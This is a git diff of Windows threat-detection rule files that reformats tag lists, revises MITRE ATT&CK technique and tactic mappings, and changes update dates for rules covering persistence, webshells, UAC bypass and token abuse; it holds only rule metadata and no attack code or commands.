"Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -84,18 +97,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.005" name = "Security Support Provider" reference = "https://attack.mitre.org/techniques/T1547/005/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml b/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml index f7f30b2155d..5ce887dd079 100644 --- a/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml +++ b/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -96,36 +96,46 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_via_update_orchestrator_service_hijack.toml b/rules/windows/persistence_via_update_orchestrator_service_hijack.toml index 9e805a654b8..4c77031fe53 100644 --- a/rules/windows/persistence_via_update_orchestrator_service_hijack.toml +++ b/rules/windows/persistence_via_update_orchestrator_service_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] @@ -147,56 +147,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.011" -name = "Services Registry Permissions Weakness" -reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.011" -name = "Services Registry Permissions Weakness" -reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml b/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml index 998595a716a..a064ad7db7c 100644 --- a/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml +++ b/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/04" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -63,7 +63,21 @@ references = ["https://www.elastic.co/security-labs/hunting-for-persistence-usin risk_score = 21 rule_id = "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -77,18 +91,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.003" name = "Windows Management Instrumentation Event Subscription" reference = "https://attack.mitre.org/techniques/T1546/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/persistence_via_wmi_stdregprov_run_services.toml b/rules/windows/persistence_via_wmi_stdregprov_run_services.toml index d1fe98c2dbe..df5ba00f618 100644 --- a/rules/windows/persistence_via_wmi_stdregprov_run_services.toml +++ b/rules/windows/persistence_via_wmi_stdregprov_run_services.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/15" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/03" [transform] [[transform.osquery]] @@ -100,7 +100,15 @@ references = [ risk_score = 73 rule_id = "70d12c9c-0dbd-4a1a-bc44-1467502c9cf6" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -162,46 +170,41 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1047" -name = "Windows Management Instrumentation" -reference = "https://attack.mitre.org/techniques/T1047/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml b/rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml index fd99f614a1a..848ae070ecd 100644 --- a/rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml +++ b/rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] @@ -62,7 +62,20 @@ references = ["https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ risk_score = 47 rule_id = "4ed493fc-d637-4a36-80ff-ac84937e5461" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "new_terms" @@ -95,39 +108,39 @@ process.parent.name:"sqlservr.exe" and process.command_line : * and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" +[[rule.threat.technique.subtechnique]] +id = "T1505.001" +name = "SQL Stored Procedures" +reference = "https://attack.mitre.org/techniques/T1505/001/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.001" -name = "SQL Stored Procedures" -reference = "https://attack.mitre.org/techniques/T1505/001/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.command_line"] diff --git a/rules/windows/persistence_webshell_detection.toml b/rules/windows/persistence_webshell_detection.toml index d2463cba3c3..9999667d1d4 100644 --- a/rules/windows/persistence_webshell_detection.toml +++ b/rules/windows/persistence_webshell_detection.toml @@ -2,7 +2,7 @@ creation_date = "2021/08/24" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/02" [rule] author = ["Elastic"] @@ -78,7 +78,22 @@ references = [ risk_score = 73 rule_id = "2917d495-59bd-4250-b395-c29409b76086" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Initial Access", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "new_terms" @@ -138,7 +153,35 @@ value = "*?:\\\\Program Files (x86)\\\\*" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" @@ -148,7 +191,6 @@ reference = "https://attack.mitre.org/techniques/T1047/" id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -164,28 +206,14 @@ id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.command_line"] diff --git a/rules/windows/persistence_werfault_reflectdebugger.toml b/rules/windows/persistence_werfault_reflectdebugger.toml index 518c4aa2c20..10b36a1c675 100644 --- a/rules/windows/persistence_werfault_reflectdebugger.toml +++ b/rules/windows/persistence_werfault_reflectdebugger.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -89,18 +89,26 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" -[[rule.threat.technique.subtechnique]] -id = "T1546.012" -name = "Image File Execution Options Injection" -reference = "https://attack.mitre.org/techniques/T1546/012/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml b/rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml index c8ff89d715e..98d75bb0f11 100644 --- a/rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml +++ b/rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/25" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -44,7 +44,14 @@ references = ["https://attack.mitre.org/techniques/T1078/"] risk_score = 47 rule_id = "b2c3d4e5-f6a7-5b6c-9d0e-1f2a3b4c5d6e" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -70,13 +77,13 @@ from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml b/rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml index 8ef66f52c9e..7a12ba94bc3 100644 --- a/rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml +++ b/rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/23" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/19" [rule] author = ["Elastic"] @@ -42,7 +42,16 @@ references = ["https://www.akamai.com/blog/security-research/abusing-dmsa-for-pr risk_score = 73 rule_id = "2c74e26b-dfe3-4644-b62b-d0482f124210" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -53,29 +62,27 @@ event.code:5136 and host.os.type:"windows" and winlog.event_data.AttributeLDAPDi [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.new_terms] field = "new_terms_fields" value = ["winlog.event_data.SubjectUserName"] diff --git a/rules/windows/privilege_escalation_create_process_as_different_user.toml b/rules/windows/privilege_escalation_create_process_as_different_user.toml index 412967333f8..683648ba45d 100644 --- a/rules/windows/privilege_escalation_create_process_as_different_user.toml +++ b/rules/windows/privilege_escalation_create_process_as_different_user.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/30" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -57,7 +57,14 @@ setup = """## Setup Audit events 4624 and 4688 are needed to trigger this rule. """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -76,36 +83,24 @@ sequence by winlog.computer_name with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" - [[rule.threat.technique.subtechnique]] id = "T1134.002" name = "Create Process with Token" reference = "https://attack.mitre.org/techniques/T1134/002/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique.subtechnique]] +id = "T1134.003" +name = "Make and Impersonate Token" +reference = "https://attack.mitre.org/techniques/T1134/003/" -[[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" -[[rule.threat.technique.subtechnique]] -id = "T1134.002" -name = "Create Process with Token" -reference = "https://attack.mitre.org/techniques/T1134/002/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_create_process_with_token_unpriv.toml b/rules/windows/privilege_escalation_create_process_with_token_unpriv.toml index 5d76a63ef19..ab8e8584da6 100644 --- a/rules/windows/privilege_escalation_create_process_with_token_unpriv.toml +++ b/rules/windows/privilege_escalation_create_process_with_token_unpriv.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -19,7 +19,14 @@ references = ["https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-win risk_score = 47 rule_id = "1b0b4818-5655-409b-9c73-341cac4bb73f" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -91,36 +98,24 @@ In Windows environments, tokens are used to represent user credentials and permi [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.001" +name = "Token Impersonation/Theft" +reference = "https://attack.mitre.org/techniques/T1134/001/" [[rule.threat.technique.subtechnique]] id = "T1134.002" name = "Create Process with Token" reference = "https://attack.mitre.org/techniques/T1134/002/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" -[[rule.threat.technique.subtechnique]] -id = "T1134.002" -name = "Create Process with Token" -reference = "https://attack.mitre.org/techniques/T1134/002/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_credroaming_ldap.toml b/rules/windows/privilege_escalation_credroaming_ldap.toml index cdb98a74b03..50b903484bb 100644 --- a/rules/windows/privilege_escalation_credroaming_ldap.toml +++ b/rules/windows/privilege_escalation_credroaming_ldap.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/09" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -76,7 +76,16 @@ Audit Directory Service Changes (Success,Failure) ``` """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Data Source: Active Directory", + "Tactic: Privilege Escalation", + "Use Case: Active Directory Monitoring", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -89,26 +98,14 @@ event.code:"5136" and host.os.type:"windows" and winlog.event_data.AttributeLDAP [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_disable_uac_registry.toml b/rules/windows/privilege_escalation_disable_uac_registry.toml index b2289c53690..8d113e3b967 100644 --- a/rules/windows/privilege_escalation_disable_uac_registry.toml +++ b/rules/windows/privilege_escalation_disable_uac_registry.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/20" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -81,7 +81,19 @@ references = [ risk_score = 47 rule_id = "d31f183a-e5b1-451b-8534-ba62bca0b404" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -101,41 +113,51 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + + 